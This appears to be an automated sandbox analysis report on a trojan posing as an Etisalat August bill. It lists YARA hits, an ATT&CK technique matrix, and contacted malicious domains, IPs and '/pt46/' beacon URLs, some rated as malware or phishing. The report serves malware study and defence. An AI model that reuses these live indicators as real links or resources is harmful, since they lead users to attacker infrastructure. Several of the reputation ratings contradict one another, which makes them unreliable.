Source: Yara match	File source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00921204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00921204
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00921806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00921806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	215 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	1 Rootkit	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Etisalat Summary Bill for the Month of August.exe	42%	ReversingLabs	Win32.Trojan.AutoitInject
Etisalat Summary Bill for the Month of August.exe	25%	Virustotal		Browse
Etisalat Summary Bill for the Month of August.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
gtm-sg-6wr2vph4409.gtm-i2d8.com	1%	Virustotal	Browse
www.vasymaman.com	1%	Virustotal	Browse
seoservicesdelhi.net	4%	Virustotal	Browse
healthsaveplus.com	7%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
ext-sq.squarespace.com	0%	Virustotal	Browse
wheresthechocolateat.com	6%	Virustotal	Browse
www.gv3l1.vip	1%	Virustotal	Browse
www.trenchonbirmingham.com	2%	Virustotal	Browse
www.iiixc759q.xyz	4%	Virustotal	Browse
www.nihilculturamail.com	0%	Virustotal	Browse
www.healthsaveplus.com	0%	Virustotal	Browse
www.wheresthechocolateat.com	1%	Virustotal	Browse
www.seoservicesdelhi.net	1%	Virustotal	Browse
www.wguujb.com	0%	Virustotal	Browse
www.melliccine.com	1%	Virustotal	Browse
www.twinportslocal.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.comon	0%	URL Reputation	safe
https://word.office.comon	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://wns.windows.com/)s	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://www.gv3l1.vip	0%	Avira URL Cloud	safe
http://www.healthsaveplus.com	0%	Avira URL Cloud	safe
http://www.melliccine.comReferer:	0%	Avira URL Cloud	safe
http://www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2	0%	Avira URL Cloud	safe
http://www.vasymaman.com/pt46/	100%	Avira URL Cloud	malware
http://www.melliccine.com/pt46/	0%	Avira URL Cloud	safe
https://status.squarespace.com	0%	Avira URL Cloud	safe
http://www.dreziuy.xyz	100%	Avira URL Cloud	malware
http://www.iiixc759q.xyz	0%	Avira URL Cloud	safe
http://www.healthsaveplus.com	0%	Virustotal		Browse
http://www.arlatwestern.shopReferer:	0%	Avira URL Cloud	safe
http://www.vasymaman.com/pt46/	5%	Virustotal		Browse
https://status.squarespace.com	0%	Virustotal		Browse
http://www.melliccine.com/pt46/	2%	Virustotal		Browse
http://www.gv3l1.vip	1%	Virustotal		Browse
http://www.iiixc759q.xyz	4%	Virustotal		Browse
http://www.dreziuy.xyz	0%	Virustotal		Browse
http://www.trenchonbirmingham.comReferer:	0%	Avira URL Cloud	safe
http://www.twinportslocal.com	0%	Avira URL Cloud	safe
http://www.seoservicesdelhi.net	0%	Avira URL Cloud	safe
http://www.arlatwestern.shop	100%	Avira URL Cloud	phishing
http://www.seoservicesdelhi.net/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=OxzdZkr64UrrS3tZ4G1zrrfmnH6WbOReSG/AAD7fX8giKNq6IAa+s9RhfDA3xDtWjS7D	0%	Avira URL Cloud	safe
http://www.dreziuy.xyzReferer:	0%	Avira URL Cloud	safe
http://www.wheresthechocolateat.comReferer:	0%	Avira URL Cloud	safe
http://www.gv3l1.vip/pt46/	0%	Avira URL Cloud	safe
http://www.melliccine.com/pt46/www.trenchonbirmingham.com	0%	Avira URL Cloud	safe
http://www.autoitscript.A	0%	Avira URL Cloud	safe
http://www.arlatwestern.shop	1%	Virustotal		Browse
http://www.seoservicesdelhi.netReferer:	0%	Avira URL Cloud	safe
http://www.arlatwestern.shop/pt46/www.jrd3s.rest	100%	Avira URL Cloud	phishing
http://www.seoservicesdelhi.net	1%	Virustotal		Browse
http://www.trenchonbirmingham.com/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve	0%	Avira URL Cloud	safe
http://www.gv3l1.vip/pt46/	1%	Virustotal		Browse
http://www.dreziuy.xyz/pt46/www.dental-implants-89083.bond	100%	Avira URL Cloud	malware
http://www.twinportslocal.com	1%	Virustotal		Browse
http://www.learneracademy.net/pt46/	0%	Avira URL Cloud	safe
http://www.vasymaman.com/pt46/www.iiixc759q.xyz	100%	Avira URL Cloud	malware
http://www.jrd3s.restReferer:	0%	Avira URL Cloud	safe
http://www.learneracademy.netReferer:	0%	Avira URL Cloud	safe
http://www.trenchonbirmingham.com/pt46/www.dreziuy.xyz	0%	Avira URL Cloud	safe
http://www.nihilculturamail.com/pt46/	0%	Avira URL Cloud	safe
http://www.trenchonbirmingham.com/pt46/	0%	Avira URL Cloud	safe
http://www.twinportslocal.com/pt46/	0%	Avira URL Cloud	safe
http://www.iiixc759q.xyz/pt46/	100%	Avira URL Cloud	malware
http://www.dental-implants-89083.bondReferer:	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.nihilculturamail.com/pt46/www.gv3l1.vip	0%	Avira URL Cloud	safe
http://www.wguujb.com/pt46/www.melliccine.com	0%	Avira URL Cloud	safe
http://www.wheresthechocolateat.com/pt46/www.wguujb.com	0%	Avira URL Cloud	safe
http://www.learneracademy.net/pt46/c	0%	Avira URL Cloud	safe
http://www.learneracademy.net	0%	Avira URL Cloud	safe
http://www.wheresthechocolateat.com	0%	Avira URL Cloud	safe
http://www.iiixc759q.xyzReferer:	0%	Avira URL Cloud	safe
http://www.seoservicesdelhi.net/pt46/	0%	Avira URL Cloud	safe
http://www.wheresthechocolateat.com/pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2	0%	Avira URL Cloud	safe
http://www.gv3l1.vip/pt46/www.healthsaveplus.com	0%	Avira URL Cloud	safe
http://www.wheresthechocolateat.com/pt46/	0%	Avira URL Cloud	safe
http://www.iiixc759q.xyz/pt46/www.nihilculturamail.com	100%	Avira URL Cloud	malware
http://www.dreziuy.xyz/pt46/	100%	Avira URL Cloud	malware
http://www.melliccine.com	0%	Avira URL Cloud	safe
www.wheresthechocolateat.com/pt46/	0%	Avira URL Cloud	safe
http://www.gv3l1.vipReferer:	0%	Avira URL Cloud	safe
http://www.wguujb.com	0%	Avira URL Cloud	safe
http://www.trenchonbirmingham.com	0%	Avira URL Cloud	safe
http://www.dental-implants-89083.bond	0%	Avira URL Cloud	safe
http://www.jrd3s.rest	0%	Avira URL Cloud	safe
http://www.healthsaveplus.com/pt46/	0%	Avira URL Cloud	safe
http://www.twinportslocal.comReferer:	0%	Avira URL Cloud	safe
http://www.dental-implants-89083.bond/pt46/www.arlatwestern.shop	0%	Avira URL Cloud	safe
http://www.twinportslocal.com/pt46/www.vasymaman.com	0%	Avira URL Cloud	safe
http://www.wguujb.com/pt46/	0%	Avira URL Cloud	safe
http://www.nihilculturamail.com	0%	Avira URL Cloud	safe
http://www.healthsaveplus.com/pt46/www.seoservicesdelhi.net	0%	Avira URL Cloud	safe
http://www.jrd3s.rest/pt46/	0%	Avira URL Cloud	safe
http://www.vasymaman.comReferer:	0%	Avira URL Cloud	safe
http://www.wguujb.comReferer:	0%	Avira URL Cloud	safe
http://www.arlatwestern.shop/pt46/	100%	Avira URL Cloud	phishing
http://www.dental-implants-89083.bond/pt46/	0%	Avira URL Cloud	safe
http://www.healthsaveplus.comReferer:	0%	Avira URL Cloud	safe
http://www.healthsaveplus.com/pt46/?BXIxB=p9DRcm8BELNBVMNAniPV5ICx4gmR3c1RxYXaT3CLClmXYljbHJslQ//IiGA9vCpcHBwF&-ZYp=fvRlPd_pa8MLs2	0%	Avira URL Cloud	safe
http://www.nihilculturamail.comReferer:	0%	Avira URL Cloud	safe
http://www.vasymaman.com	0%	Avira URL Cloud	safe
http://www.jrd3s.rest/pt46/www.learneracademy.net	0%	Avira URL Cloud	safe
http://www.seoservicesdelhi.net/pt46/www.wheresthechocolateat.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtm-sg-6wr2vph4409.gtm-i2d8.com	93.179.125.252	true	true	1%, Virustotal, Browse	unknown
www.vasymaman.com	213.186.33.5	true	true	1%, Virustotal, Browse	unknown
seoservicesdelhi.net	162.254.39.135	true	true	4%, Virustotal, Browse	unknown
healthsaveplus.com	199.116.255.220	true	true	7%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
ext-sq.squarespace.com	198.185.159.144	true	true	0%, Virustotal, Browse	unknown
wheresthechocolateat.com	76.223.105.230	true	true	6%, Virustotal, Browse	unknown
www.nihilculturamail.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.gv3l1.vip	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.trenchonbirmingham.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.healthsaveplus.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.twinportslocal.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.iiixc759q.xyz	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.wguujb.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.wheresthechocolateat.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.melliccine.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.seoservicesdelhi.net	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2	true	Avira URL Cloud: safe	unknown
http://www.seoservicesdelhi.net/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=OxzdZkr64UrrS3tZ4G1zrrfmnH6WbOReSG/AAD7fX8giKNq6IAa+s9RhfDA3xDtWjS7D	true	Avira URL Cloud: safe	unknown
http://www.trenchonbirmingham.com/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve	true	Avira URL Cloud: safe	unknown
http://www.wheresthechocolateat.com/pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2	true	Avira URL Cloud: safe	unknown
www.wheresthechocolateat.com/pt46/	true	Avira URL Cloud: safe	unknown
http://www.healthsaveplus.com/pt46/?BXIxB=p9DRcm8BELNBVMNAniPV5ICx4gmR3c1RxYXaT3CLClmXYljbHJslQ//IiGA9vCpcHBwF&-ZYp=fvRlPd_pa8MLs2	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000003.00000002.4491886070.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.gv3l1.vip	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.healthsaveplus.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vasymaman.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.melliccine.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.melliccine.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://status.squarespace.com	explorer.exe, 00000003.00000002.4498093805.000000001132F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.000000000631F000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000002.4494950647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044490024.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dreziuy.xyz	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.iiixc759q.xyz	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.arlatwestern.shopReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trenchonbirmingham.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000003.3814791778.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3808468308.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009BAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492679076.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000003.00000000.2041278354.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2041784905.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2041756033.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.twinportslocal.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.seoservicesdelhi.net	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.arlatwestern.shop	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.dreziuy.xyzReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wheresthechocolateat.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gv3l1.vip/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.melliccine.com/pt46/www.trenchonbirmingham.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.A	explorer.exe, 00000003.00000000.2044974107.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.seoservicesdelhi.netReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arlatwestern.shop/pt46/www.jrd3s.rest	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.dreziuy.xyz/pt46/www.dental-implants-89083.bond	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.learneracademy.net/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vasymaman.com/pt46/www.iiixc759q.xyz	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.jrd3s.restReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.learneracademy.netReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trenchonbirmingham.com/pt46/www.dreziuy.xyz	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nihilculturamail.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trenchonbirmingham.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000003.00000002.4495253609.000000000C54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096247991.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044490024.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.twinportslocal.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iiixc759q.xyz/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/)s	explorer.exe, 00000003.00000002.4491886070.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dental-implants-89083.bondReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.2044974107.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097187638.000000000C8E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095387314.000000000C8CB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nihilculturamail.com/pt46/www.gv3l1.vip	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wguujb.com/pt46/www.melliccine.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wheresthechocolateat.com/pt46/www.wguujb.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.learneracademy.net/pt46/c	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.learneracademy.net	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wheresthechocolateat.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iiixc759q.xyzReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.seoservicesdelhi.net/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gv3l1.vip/pt46/www.healthsaveplus.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.wheresthechocolateat.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iiixc759q.xyz/pt46/www.nihilculturamail.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com	explorer.exe, 00000003.00000003.3808468308.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009BAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3813043800.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492753701.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dreziuy.xyz/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.melliccine.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gv3l1.vipReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wguujb.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dental-implants-89083.bond	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trenchonbirmingham.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrd3s.rest	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.healthsaveplus.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.twinportslocal.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000002.4489159075.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2040468425.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dental-implants-89083.bond/pt46/www.arlatwestern.shop	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.twinportslocal.com/pt46/www.vasymaman.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wguujb.com/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nihilculturamail.com	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.healthsaveplus.com/pt46/www.seoservicesdelhi.net	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000003.00000002.4491886070.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jrd3s.rest/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vasymaman.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wguujb.comReferer:	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arlatwestern.shop/pt46/	explorer.exe, 00000003.00000002.4491886070.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
